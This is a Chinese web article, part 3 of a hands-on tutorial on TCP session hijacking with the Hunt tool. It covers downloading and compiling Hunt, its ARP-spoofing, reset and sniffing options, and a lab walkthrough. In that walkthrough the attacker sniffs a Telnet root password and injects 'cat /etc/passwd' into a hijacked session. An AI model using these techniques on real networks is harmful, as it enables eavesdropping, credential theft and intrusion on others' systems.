IT运维管理,创造商业价值!
中国IT运维网首页 | 资讯中心 | 运维管理 | 信息安全 | CIO视界 | 云计算 | 最佳案例 | 运维资源 | 专题策划 | 知识库 | 论坛

黑客技术分析 会话劫持攻击实战讲解(3)

2009年06月05日
比特网论坛/佚名

  现在来看看如果使用Hunt,首先是下载并编译源代码:

  [root@dahubaobao hunt]#wget http://www.ringz.org/hunt-1.5.tgz

  [root@dahubaobao hunt]#tar zxvf hunt-1.5.tgz

  [root@dahubaobao hunt]#cd hunt-1.5

  [root@dahubaobao hunt-1.5]#make

  [root@dahubaobao hunt-1.5]#./hunt

  //Hunt是完全交互试的操作

  解释一下各个选项的含义

  l/w/r) list/watch/reset connections

  //l(字母l)为查看当前网络上的会话;w为监视当前网络上的某个会话;r为重置当前网络上的某个会话。

  a) arp/simple hijack (avoids ack storm if arp used)

  //中间人攻击(会话劫持),Hunt先进行ARP欺骗,然后进行会话劫持。使用此方法可以避免出现ACK风暴。

  s) simple hijack

  //简单的会话劫持,也就是注射式攻击。会出现ACK风暴。

  d) daemons rst/arp/sniff/mac

  //该选项共实现四个功能,分别为:终止会话,自动发送带RST标志位的TCP包;ARP欺骗后进行数据包转发;不用说了,嗅探功能;在当前网络上收集MAC地址。

  其他的选项很简单,不在多说了。还是来看看具体的例子吧,我想大家都等不及了!^_^

  2、应用实例

  测试环境:

  攻击者:Red Hat Linux 9.0 IP:192.168.0.10

  主机A:Windows Advanced Server IP:192.168.0.1

  主机B:FreeBSD 4.9 STABLE IP:192.168.0.20

  [root@dahubaobao hunt-1.5]#./hunt

  /*

  * hunt 1.5

  * multipurpose connection intruder / sniffer for Linux

  * (c) 1998-2000 by kra

  */

  starting hunt

  --- Main Menu --- rcvpkt 0, free/alloc 63/64 ------

  l/w/r) list/watch/reset connections

  u) host up tests

  a) arp/simple hijack (avoids ack storm if arp used)

  s) simple hijack

  d) daemons rst/arp/sniff/mac

  o) options

  x) exit

  *> l //查看当前网络上的会话

  0)192.168.0.1 [3465] ?192.168.0.20 [23]

  //主机A正在Telnet到主机B

  --- Main Menu --- rcvpkt 0, free/alloc 63/64 ------

  l/w/r) list/watch/reset connections

  u) host up tests

  a) arp/simple hijack (avoids ack storm if arp used)

  s) simple hijack

  d) daemons rst/arp/sniff/mac

  o) options

  x) exit

  *> w //监视当前网络上的会话

  0)192.168.0.1 [3465] ?192.168.0.20 [23]

  Choose conn>0 //选择打算监视的会话。由于我的条件有限,不能模拟多个会话,请多见量。

  Dump [s]rc/[d]st/[b]oth [b]> //回车

  Print sec/dst same charactes y/n [n]> //回车

 现在就可以监视会话了。主机A输入的一切内容,我们都可以看到。主机A在Telnet并登陆之后,直接su root,password:后边的就是root的密码。现在这个系统已经完全由你所控制了,自由发挥吧!

  --- Main Menu --- rcvpkt 0, free/alloc 63/64 ------

  l/w/r) list/watch/reset connections

  u) host up tests

  a) arp/simple hijack (avoids ack storm if arp used)

  s) simple hijack

  d) daemons rst/arp/sniff/mac

  o) options

  x) exit

  *> s //进行注射式会话劫持

  0)192.168.0.1 [3465] ?192.168.0.20 [23]

  choose conn> 0

  dump connection y/n [n]>

  Enter the command string you wish executed or [cr]> cat /etc/passwd

  攻击者的意图是获取主机B的passwd文件的内容,但由于注射式会话劫持缺陷,导致了ACK风暴,所以Hunt向会话双方发送了一个带RST标志位的TCP包来阻止ACK风暴。

  --- Main Menu --- rcvpkt 0, free/alloc 63/64 ------

发表评论请到:http://bbs.cnitom.com